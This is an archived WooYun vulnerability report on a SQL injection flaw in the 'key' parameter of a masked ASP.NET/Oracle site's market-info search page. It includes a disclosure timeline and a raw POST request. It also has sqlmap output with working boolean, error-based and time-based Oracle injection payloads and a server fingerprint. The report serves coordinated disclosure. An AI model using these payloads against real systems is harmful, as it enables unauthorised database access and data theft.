乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-02: 细节已通知厂商并且等待厂商处理中 2015-12-04: 厂商已经确认,细节仅向厂商公开 2015-12-14: 细节向核心白帽子及相关领域专家公开 2015-12-24: 细节向普通白帽子公开 2016-01-03: 细节向实习白帽子公开 2016-01-18: 细节向公众公开
RT
http://**.**.**.**/MarketInfo/Search/marketInfoListPb.aspx?iURLFlag=4&marketInfoSort=6漏洞地址:
POST /MarketInfo/Search/marketInfoListPb.aspx?iURLFlag=4&marketInfoSort=6 HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveContent-Length: 2667Cache-Control: no-cacheOrigin: http://**.**.**.**X-MicrosoftAjax: Delta=trueUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept: */*Referer: http://**.**.**.**/MarketInfo/Search/marketInfoListPb.aspx?iURLFlag=4&marketInfoSort=6Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=tgenqt2jroyfgervrkvrvru0ScriptManager1=updatepanel1%7Csearch&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJOTk3MDU0MTAzD2QWAgIDD2QWBAIDD2QWAgIBDw8WAh4EVGV4dAUO5oKo5aW9LCDmuLjlrqJkZAIFD2QWAmYPZBYCAgkPZBYCZg9kFgQCAQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCCmQWAmYPZBYYZg8PFgIeB1Zpc2libGVoZGQCAQ9kFgICAQ9kFgJmDxUDBDIxMjaPAee7jeWFtOa7qOa1t%2BS6p%2BS4mumbhuiBmuWMuumSsea4heiHs%2Ba7qOa1t%2BW3peS4muWMuuWFrOi3r%2BW3peeoi%2BaWveW3pe%2B8iOWcn%2BW7ujPmoIfvvInlkozmlr3lt6Xnm5HnkIbvvIjnrKwy5ZCI5ZCM5q6177yJ5oub5qCH6K%2BE5qCH57uT5p6c5YWs56S6CjIwMTUtMDctMDlkAgIPZBYCAgEPZBYCZg8VAwQyMTI1V%2BS5jeWYieiLj%2Be6v%2BWNl%2Ba5luWMuuiIqumBk%2BWFu%2BaKpOW3peeoi%2B%2B8iOWFreacn%2B%2B8ieaWveW3peebkeeQhuaLm%2BaKleagh%2Be7k%2BaenOWFrOekuuihqAoyMDE1LTA3LTA4ZAIDD2QWAgIBD2QWAmYPFQMEMjEyNFXnu43or7jpq5jpgJ%2Flhazot68yMDE15bm05rKl6Z2S6Lev6Z2i5YW75oqk5LiT6aG55bel56iL5pa95bel5oub5qCH6K%2BE5qCH57uT5p6c5YWs56S6CjIwMTUtMDctMDhkAgQPZBYCAgEPZBYCZg8VAwQyMTIzbTMxMOecgemBk%2BiIn%2BWxseacseWutuWwluaute%2B8iEsyKzQwMO%2B9nks1KzUwMO%2B8jEs5KzgwMO%2B9nksxMSswODbvvInlt6XnqIvmlr3lt6Xnm5HnkIbmi5vmoIfmipXmoIfnu5PmnpzlhaznpLoKMjAxNS0wNy0wN2QCBQ9kFgICAQ9kFgJmDxUDBDIxMjJj5bKx5bGx5Y6%2F5a6Y5bGx6Iez56eA5bGx5YWs6Lev56eA5bGx5aSn5qGl5bel56iL5pa95bel55uR55CG56ysWC1KTC0y5qCH5q615oub5qCH6K%2BE5qCH57uT5p6c5YWs56S6CjIwMTUtMDctMDZkAgYPZBYCAgEPZBYCZg8VAwQyMTIxUeeOi%2Baxn%2BazvumVh%2BWMl%2BiNt%2BiHs%2BWNl%2Baxh%2BWGnOadkeWFrOi3r%2BW3peeoi%2BaWveW3peebkeeQhuaLm%2BaKleagh%2Be7k%2BaenOWFrOekuuihqAoyMDE1LTA3LTA2ZAIHD2QWAgIBD2QWAmYPFQMEMjEyMGnmtZnmsZ%2FnnIHmna3lt57vvIjnuqLlnqbvvInoh7Pph5HljY7pq5jpgJ%2Flhazot6%2FmlLnmianlu7rlt6XnqIvmnLrnlLXmlr3lt6Xnm5HnkIbmi5vmoIfor4TmoIfnu5PmnpzlhaznpLoKMjAxNS0wNy0wMWQCCA9kFgICAQ9kFgJmDxUDBDIxMTlp5rWZ5rGf55yB5p2t5bee77yI57qi5Z6m77yJ6Iez6YeR5Y2O6auY6YCf5YWs6Lev5pS55omp5bu65bel56iL5oi%2F5bu65pa95bel55uR55CG5oub5qCH6K%2BE5qCH57uT5p6c5YWs56S6CjIwMTUtMDYtMzBkAgkPZBYCAgEPZBYCZg8VAwQyMTE4ggHmna3nu43lj7Dpq5jpgJ%2Flhazot6%2Flt6XnqIvnu43lhbTph5HljY7mrrXnrKxIU1QtVEowM%2Bagh%2BauteWcn%2BW7uuaWveW3peaLm%2Bagh%2BOAgeesrEhTVC1KTDAy55uR55CG5ZCI5ZCM5q615oub5qCH6K%2BE5qCH57uT5p6c5YWs56S6CjIwMTUtMDYtMTlkAgoPZBYCAgEPZBYCZg8VAwQyMTE3ZDMyOeWbvemBk%2BiIn%2BWxseauteaUueW7uuW3peeoi%2B%2B8iOaZrumZgOaute%2B8iUs0Mis0MzEuNe%2B9nks0OSszMTjmlr3lt6Xnm5HnkIbmi5vmoIfmipXmoIfnu5PmnpzlhaznpLoKMjAxNS0wNi0xN2QCCw8PFgIfA2hkZAIDDw8WBh4JUGFnZUluZGV4Zh4IUGFnZVNpemUCCh4MVG90YWxSZWNvcmRzArQBZGQYAQUJR3JpZFZpZXcxDzwrAAoBCAIBZJihcKmH%2BiNUFAIwiqNlr9UBJcWz&__EVENTVALIDATION=%2FwEWEQLy%2Ffq6AgKA%2BP2pCQLigPTXCQLH0pL8CQKi6If1BQLzo%2BG0BALYusOfCgKp9pzfCAKOjf%2FJDgLfyNiJDQLE37r0AgLlh7fgDgLKnpnLBAKMr4KNBQLh3Pb1DQKN6Z%2B0DQKtj6%2F%2BBw6amyUSMU1LokNp8zcZCmoGihWd&key=1&pager%24GoToPage=&__ASYNCPOST=true&search=%E6%9F%A5%E8%AF%A2
key参数存在注入
---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ScriptManager1=updatepanel1|search&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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&__EVENTVALIDATION=/wEWEQLy/fq6AgKA+P2pCQLigPTXCQLH0pL8CQKi6If1BQLzo+G0BALYusOfCgKp9pzfCAKOjf/JDgLfyNiJDQLE37r0AgLlh7fgDgLKnpnLBAKMr4KNBQLh3Pb1DQKN6Z+0DQKtj6/+Bw6amyUSMU1LokNp8zcZCmoGihWd&key=1%' AND 5697=5697 AND '%'='&pager$GoToPage=&__ASYNCPOST=true&search=%E6%9F%A5%E8%AF%A2 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: ScriptManager1=updatepanel1|search&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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&__EVENTVALIDATION=/wEWEQLy/fq6AgKA+P2pCQLigPTXCQLH0pL8CQKi6If1BQLzo+G0BALYusOfCgKp9pzfCAKOjf/JDgLfyNiJDQLE37r0AgLlh7fgDgLKnpnLBAKMr4KNBQLh3Pb1DQKN6Z+0DQKtj6/+Bw6amyUSMU1LokNp8zcZCmoGihWd&key=1%' AND 9225=CTXSYS.DRITHSX.SN(9225,(CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9225=9225) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113))) AND '%'='&pager$GoToPage=&__ASYNCPOST=true&search=%E6%9F%A5%E8%AF%A2 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: ScriptManager1=updatepanel1|search&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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&__EVENTVALIDATION=/wEWEQLy/fq6AgKA+P2pCQLigPTXCQLH0pL8CQKi6If1BQLzo+G0BALYusOfCgKp9pzfCAKOjf/JDgLfyNiJDQLE37r0AgLlh7fgDgLKnpnLBAKMr4KNBQLh3Pb1DQKN6Z+0DQKtj6/+Bw6amyUSMU1LokNp8zcZCmoGihWd&key=1%' AND 1752=DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(119)||CHR(82)||CHR(71),5) AND '%'='&pager$GoToPage=&__ASYNCPOST=true&search=%E6%9F%A5%E8%AF%A2---[16:34:15] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oracle
危害等级:高
漏洞Rank:10
确认时间:2015-12-04 16:47
CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置.
暂无